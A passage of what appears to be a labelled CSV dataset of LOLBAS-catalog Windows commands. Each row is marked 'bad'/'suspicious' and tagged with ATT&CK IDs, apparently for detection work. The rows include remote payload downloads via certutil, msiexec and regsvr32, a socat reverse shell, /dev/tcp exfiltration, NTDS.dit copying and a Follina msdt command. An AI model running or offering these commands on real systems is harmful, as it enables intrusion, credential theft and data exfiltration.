process get brief /format:""{REMOTEURL:.xsl}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wmic.yml,Wmic.exe,Execute,"[""T1218"", {""Execute"": ""XSL""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Create a volume shadow copy of NTDS.dit that can be copied.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6cb324ad13ed93ed94be841a,"wmic.exe process get brief /format:""{PATH_SMB:.xsl}""","wmic.exe process get brief /format:""{PATH_SMB:.xsl}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wmic.yml,Wmic.exe,Execute,"[""T1218"", {""Execute"": ""XSL""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes JScript or VBScript embedded in the target remote XSL stylsheet.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0b4496dc922324e925e1295c,"wmic.exe datafile where ""Name='C:\\windows\\system32\\calc.exe'"" call Copy ""C:\\users\\public\\calc.exe""","wmic.exe datafile where ""Name='C:\\windows\\system32\\calc.exe'"" call Copy ""C:\\users\\public\\calc.exe""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wmic.yml,Wmic.exe,Copy,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copy file from source to destination.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5556118672bba5acfd96b49a,msiexec /quiet /i {PATH:.msi},msiexec /quiet /i {PATH:.msi},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msiexec.yml,Msiexec.exe,Execute,"[""T1218.007"", {""Execute"": ""MSI""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Installs the target .MSI file silently.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 36ebb3fee96466cfab023c75,msiexec /q /i {REMOTEURL},msiexec /q /i {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msiexec.yml,Msiexec.exe,Execute,"[""T1218.007"", {""Execute"": ""MSI""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Installs the target remote & renamed .MSI file silently.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 19e4d312cd293848699343f7,msiexec /y {PATH_ABSOLUTE:.dll},msiexec /y {PATH_ABSOLUTE:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msiexec.yml,Msiexec.exe,Execute,"[""T1218.007"", {""Execute"": ""DLL""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Calls DllRegisterServer to register the target DLL.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c0052a6ceb04fbeba9edb0d2,msiexec /z {PATH_ABSOLUTE:.dll},msiexec /z {PATH_ABSOLUTE:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msiexec.yml,Msiexec.exe,Execute,"[""T1218.007"", {""Execute"": ""DLL""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Calls DllUnregisterServer to un-register the target DLL.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review df9271a5d9df69cae7dd9224,"msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS=""{REMOTEURL:.mst}"" /qb","msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS=""{REMOTEURL:.mst}"" /qb",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msiexec.yml,Msiexec.exe,Execute,"[""T1218.007"", {""Execute"": ""MSI""}, {""Execute"": ""MST""}, {""Execute"": ""Remote""}]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 53aac1f211930da36b5b363a,sigverif.exe,sigverif.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Sigverif.yml,Sigverif.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}, {""Application"": ""GUI""}]","Windows vista, Windows 7, Windows 8, Windows 10, Windows 11",0.85,False,"Launch sigverif.exe GUI, click 'Advanced', specify arbitrary executable path as 'log file name', then click 'View Log' to execute the binary.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c3aad0842fee8ccc12a8e096,odbcad32.exe,odbcad32.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/odbcad32.yml,odbcad32.exe,UAC Bypass,"[""T1548.002"", {""Execute"": ""CMD""}, {""Application"": ""GUI""}]","Windows 10, Windows 11",0.85,False,"Launch odbcad32.exe GUI, click 'Tracing' tab, click 'Browsing' button, enter abitrary command in the File Dialog's path, press enter.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8bb980851478952a5444b8a4,wt.exe {CMD},wt.exe {CMD},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/wt.yml,wt.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]",Windows 11,0.85,False,Execute a command via Windows Terminal.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e671300d020eaa57ec031fab,"ssh localhost ""{CMD}""","ssh localhost ""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ssh.yml,ssh.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]","Windows 10 1809, Windows Server 2019",0.85,False,Executes specified command on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e98739e3b5d5c9d106a0ca79,"ssh -o ProxyCommand=""{CMD}"" .","ssh -o ProxyCommand=""{CMD}"" .",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ssh.yml,ssh.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]",Windows 10,0.85,False,Executes specified command from ssh.exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 94331c8287b33ab955c36e9e,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:.,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:.,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Addinutil.yml,AddinUtil.exe,Execute,"[""T1218"", {""Execute"": "".NetObjects""}]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"AddinUtil is executed from the directory where the 'Addins.Store' payload exists, AddinUtil will execute the 'Addins.Store' payload.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fb3c78a8c3bfbc5ea42e918f,ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL},ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/ConfigSecurityPolicy.yml,ConfigSecurityPolicy.exe,Upload,"[""T1567""]",Windows 10,0.85,False,"Upload file, credentials or data exfiltration in general",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a8f63b4561db22ffa1afd0e2,ConfigSecurityPolicy.exe {REMOTEURL},ConfigSecurityPolicy.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/ConfigSecurityPolicy.yml,ConfigSecurityPolicy.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows 10, Windows 11",0.85,False,It will download a remote payload and place it in INetCache.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8e9635807b7e5332f494a9bc,msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE,msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msdt.yml,Msdt.exe,Execute,"[""T1218"", {""Application"": ""GUI""}, {""Execute"": ""MSI""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3e420042a422fa88a08294bc,"msdt.exe /id PCWDiagnostic /skip force /param ""IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe""","msdt.exe /id PCWDiagnostic /skip force /param ""IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Msdt.yml,Msdt.exe,AWL Bypass,"[""T1202"", {""Application"": ""GUI""}, {""Execute"": ""CMD""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the ""PCWDiagnostic"" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f435345e2dcf8b84e76fb104,"explorer.exe /root,""{PATH_ABSOLUTE:.exe}""","explorer.exe /root,""{PATH_ABSOLUTE:.exe}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Explorer.yml,Explorer.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]","Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute specified .exe with the parent process spawning from a new instance of explorer.exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review aab40b51ae1121ca48c32d69,explorer.exe {PATH_ABSOLUTE:.exe},explorer.exe {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Explorer.yml,Explorer.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Execute notepad.exe with the parent process spawning from a new instance of explorer.exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review caccdd0a008bf0ffe7738e11,certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe},certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Certutil.yml,Certutil.exe,Download,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Download and save an executable to disk in the current folder.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dffe1bcb280567075a937add,certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe},certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Certutil.yml,Certutil.exe,Download,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\` when not.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ba6abc1b88b98f8d819bd92c,certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt,certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Certutil.yml,Certutil.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Download and save a .ps1 file to an Alternate Data Stream (ADS).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 68196420585ed9e5d5d99c53,certutil.exe -URL {REMOTEURL:.exe},certutil.exe -URL {REMOTEURL:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Certutil.yml,Certutil.exe,Download,"[""T1105"", {""Application"": ""GUI""}]","Windows 10, Windows 11",0.85,False,Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\`.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f6345e1de6ea8d663df3ab0d,certutil -encode {PATH} {PATH:.base64},certutil -encode {PATH} {PATH:.base64},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Certutil.yml,Certutil.exe,Encode,"[""T1027.013""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Command to encode a file using Base64,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6cdb5d9205026686b919039e,certutil -decode {PATH:.base64} {PATH},certutil -decode {PATH:.base64} {PATH},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Certutil.yml,Certutil.exe,Decode,"[""T1140""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Command to decode a Base64 encoded file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0d19b7b3714e20a10b43492e,certutil -decodehex {PATH:.hex} {PATH},certutil -decodehex {PATH:.hex} {PATH},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Certutil.yml,Certutil.exe,Decode,"[""T1140""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Command to decode a hexadecimal-encoded file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 198705bf62f1b3553399ca44,xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC},xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Xwizard.yml,Xwizard.exe,Execute,"[""T1218"", {""Execute"": ""COM""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Xwizard.exe running a custom class that has been added to the registry.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f64db374f0a00196f2533ce0,xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC},xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Xwizard.yml,Xwizard.exe,Execute,"[""T1218"", {""Execute"": ""COM""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4e2cb872028bee48f0ad1bbf,xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL},xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Xwizard.yml,Xwizard.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows 10, Windows 11",0.85,False,"Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 752cc783154b09557da7ec79,odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}},odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Odbcconf.yml,Odbcconf.exe,Execute,"[""T1218.008"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute DllRegisterServer from DLL specified.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f19e965cdfecb79f8332103a,"odbcconf INSTALLDRIVER ""lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2"" odbcconf configsysdsn ""lolbas-project"" ""DSN=lolbas-project""","odbcconf INSTALLDRIVER ""lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2"" odbcconf configsysdsn ""lolbas-project"" ""DSN=lolbas-project""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Odbcconf.yml,Odbcconf.exe,Execute,"[""T1218.008"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Install a driver and load the DLL. Requires administrator privileges.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 635063c101c6d9e297839471,odbcconf -f {PATH:.rsp},odbcconf -f {PATH:.rsp},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Odbcconf.yml,Odbcconf.exe,Execute,"[""T1218.008""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 781ecc1020822621d87cc7b1,esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o,esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Esentutl.yml,Esentutl.exe,Copy,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copies the source VBS file to the destination VBS file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2953468b8706a05ad68300db,esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o,esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Esentutl.yml,Esentutl.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 602ad621f4d320c46020df65,esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o,esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Esentutl.yml,Esentutl.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copies the source Alternate Data Stream (ADS) to the destination EXE.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5547551884f6bfaef40d7f14,esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o,esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Esentutl.yml,Esentutl.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1ed98cd85ac674e04b33db1e,esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o,esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Esentutl.yml,Esentutl.exe,Download,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copies the source EXE to the destination EXE file,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 35cde6bbbfd5ffe6259f56a9,esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d {PATH_ABSOLUTE:.dit},esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d {PATH_ABSOLUTE:.dit},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Esentutl.yml,Esentutl.exe,Copy,"[""T1003.003""]","Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server",0.85,False,Copies a (locked) file using Volume Shadow Copy,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 64e90c835a6b0ecb7078071b,Register-cimprovider -path {PATH_ABSOLUTE:.dll},Register-cimprovider -path {PATH_ABSOLUTE:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Register-cimprovider.yml,Register-cimprovider.exe,Execute,"[""T1218"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Load the target .DLL.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 05c7684ac3cb26f07166b616,setres.exe -w 800 -h 600,setres.exe -w 800 -h 600,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Setres.yml,Setres.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]","Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022",0.85,False,Sets the resolution and then launches 'choice' command from the working directory.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ffff652860a12f6acaa2949d,Pcwrun.exe {PATH_ABSOLUTE:.exe},Pcwrun.exe {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Pcwrun.yml,Pcwrun.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Open the target .EXE file with the Program Compatibility Wizard.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f8685ed3d9ca3558977f19e9,Pcwrun.exe /../../$(calc).exe,Pcwrun.exe /../../$(calc).exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Pcwrun.yml,Pcwrun.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 12e21ad60d93239572690afd,write.exe,write.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/write.yml,write.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}, {""Requires"": ""Registry Change""}]","Windows 10, Windows 11 (before 24H2)",0.85,False,Executes a binary provided in default value of `HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\wordpad.exe`.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b1fdc21180fde42d5ec72652,cipher /w:{PATH_ABSOLUTE:folder},cipher /w:{PATH_ABSOLUTE:folder},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cipher.yml,Cipher.exe,Tamper,"[""T1485""]","Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Zero out a file,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 10404c36e2e5f12b66def9db,cipher.exe /e {PATH_ABSOLUTE},cipher.exe /e {PATH_ABSOLUTE},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cipher.yml,Cipher.exe,Tamper,"[""T1562""]",Windows 10,0.85,False,Encrypt a file,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d028363bd5f75d02cdf0b89d,psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0,psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Psr.yml,Psr.exe,Reconnaissance,"[""T1113""]",since Windows 7 (client) / Windows 2008 R2,0.85,False,"Record a user screen without creating a GUI. You should use ""psr.exe /stop"" to stop recording and create output file.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 76e2d6d55c59abd9da467851,Ldifde -i -f {PATH:.ldf},Ldifde -i -f {PATH:.ldf},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ldifde.yml,Ldifde.exe,Download,"[""T1105""]","Windows Server with AD Domain Services role, Windows 10 with AD LDS role.",0.85,False,"Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f9cada56f46c4823bdd36239,"bash.exe -c ""{CMD}""","bash.exe -c ""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Bash.yml,Bash.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]",Windows 10,0.85,False,Executes executable from bash.exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review aa13ba959f3fa10b2bf93f0f,"bash.exe -c ""socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane""","bash.exe -c ""socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Bash.yml,Bash.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]",Windows 10,0.85,False,Executes a reverse shell,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9c383ec51b87ea5bdd66b15e,bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24',bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24',bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Bash.yml,Bash.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]",Windows 10,0.85,False,Exfiltrate data,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review de43683615d0fdddcec97e1a,bash.exe,bash.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Bash.yml,Bash.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}]","Windows 10, Windows Server 2019, Windows 11",0.85,False,"When executed, `bash.exe` queries the registry value of `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation`, which contains a folder path (`c:\program files\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f3b9268db2038b7c0f13c72a,regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll,regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Regsvr32.yml,Regsvr32.exe,AWL Bypass,"[""T1218.010"", {""Execute"": ""SCT""}, {""Execute"": ""Remote""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute the specified remote .SCT script with scrobj.dll.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b80319048e5245c5b07f9fc1,regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll,regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Regsvr32.yml,Regsvr32.exe,AWL Bypass,"[""T1218.010"", {""Execute"": ""SCT""}]","Windows vista, Windows 7, Windows 8, Windows 